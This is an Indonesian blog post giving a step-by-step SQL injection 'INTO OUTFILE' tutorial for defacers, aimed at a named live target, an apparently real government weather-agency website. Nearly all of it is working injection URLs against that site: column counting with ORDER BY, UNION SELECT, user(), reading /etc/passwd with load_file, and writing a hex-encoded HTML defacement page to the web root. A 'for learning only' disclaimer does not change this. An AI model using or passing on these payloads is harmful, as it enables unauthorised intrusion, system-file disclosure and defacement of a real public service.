Lompat ke konten Lompat ke sidebar Lompat ke footer
Beranda / coding / deface / hacking / jaringan / keamanan / pembelajaran / tutorial / website

Tutorial SQL Injection Into Outfile untuk pemula

Oleh Randi Noober Posting Komentar


tutorial sql into outfile
tutorial sql into outfile.

Tutorial SQL Info Outfile

Note: tutorial ini hanya untuk pembelajaran

Assalamualaikum, halo pengunjung selamat datang di blog saya Randi Noober, pada halaman kali ini saya akan membagikan tutorial SQL Into Outfile. Teknik ini biasanya digunakan oleh Defacer / gray hat untuk mengupload shell mereka di website yang sudah mereka targetkan.

Live target: 
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa

Langkah pertama lakukan pentesting terlebih dahulu apalah website tersebut vuln atau tidak. Beri tanda ' di parameternya, jika terjadi perubahan seperti blank, terdapat notif warning atau semacamnya yang membuat tampilan berubah itu berarti vuln. 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'

tutorial sql into outfile
tutorial sql into outfile.


Selanjutnya periksa jumlah column dengan memasukan query ORDER BY di URL 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+ORDER+BY+1--+-

Jika tampilan halaman kembali seperti semula ubah angka yang ada di URL menjadi 2, jika tidak ada perubahan ubah angka di URL secara perlahan.

Nah disini saya sudah mengetahui jumlah columnnya yaitu 8, Berikut querynya. 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+ORDER+BY+8--+-

Jika angka di URL adalah 9, lalu terjadi tampilan halaman berubah menjadi blank atau sejenisnya itu berarti jumlah tabelnya ada 8.

tutorial sql into outfile
tutorial sql into outfile.


Jika sudah hapus query order by tadi beserta angkanya, lalu masukan query UNION SELECT untuk menampilkan angka yang ditampilkan dihalaman.

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+UNION+SELECT+1,2,3,4,5,6,7,8--+-

Jika tidak togelnya tidak muncul kasih tanda - dibelakang angka / huruf parameter
Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+UNION+SELECT+1,2,3,4,5,6,7,8--+-

Urutan angka seperti 1,2,3 dan seterusnya itu tergantung jumlah tabel, jadi jika jumlah tabel ada 100 berarti urutan angka yang ada di query UNION SELECT harus 1,2,3 sampai seratus. 

tutorial sql into outfile
tutorial sql into outfile.

Jika sudah mengetahui angka togelnya silahkan masukan query user() sesuai angka togel yang muncul di halaman untuk mengecek user dari website tersebut, jika usernya seperti root@namaweb itu berarti vuln. 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=78b0oa'+UNION+SELECT+1,2,3,4,user(),6,7,8--+-

tutorial sql into outfile
tutorial sql into outfile.

Langkah selanjutnya adalah mengecek path agar bisa mengupload file diwebsite tersebut dengan memasukan query load_file('/etc'passwd') 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+UNION+SELECT+1,2,3,4,load_file('/etc/passwd'),6,7,8--+-

tutorial sql into outfile
tutorial sql into outfile.


Jika sudah masukan kode html yang sudah di encode ke kode hexadisimal, lalu masukan query into outfilenya. 

Contoh:
https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+UNION+SELECT+1,2,3,4,KODEHEX,6,7,8+INTO+OUTFILE+'path/namafile.html'--+-

https://cews.bmkg.go.id/Diseminasi_Terkini/Detail_SMS.bmkg?eventid=-78b0oa'+UNION+SELECT+1,2,3,4,0x3c626f6479207374796c653d2223313130223e0d0a3c683120616c69676e3d2263656e74657222207374796c653d22636f6c6f723a23306630223e7475746f7269616c2062792052616e6469204e6f6f6265723c2f68313e,6,7,8+INTO+OUTFILE+'E:/WWW/1111.htm'--+-

Akses file:
https://cews.bmkg.go.id/namafile.html

Sekian tutorial pada halaman ini, jika ada kesalahan atau kekurangan saya pribadi mohon maaf, Wassalamualaikum. 

Anda mungkin menyukai postingan ini

Posting Komentar untuk "Tutorial SQL Injection Into Outfile untuk pemula"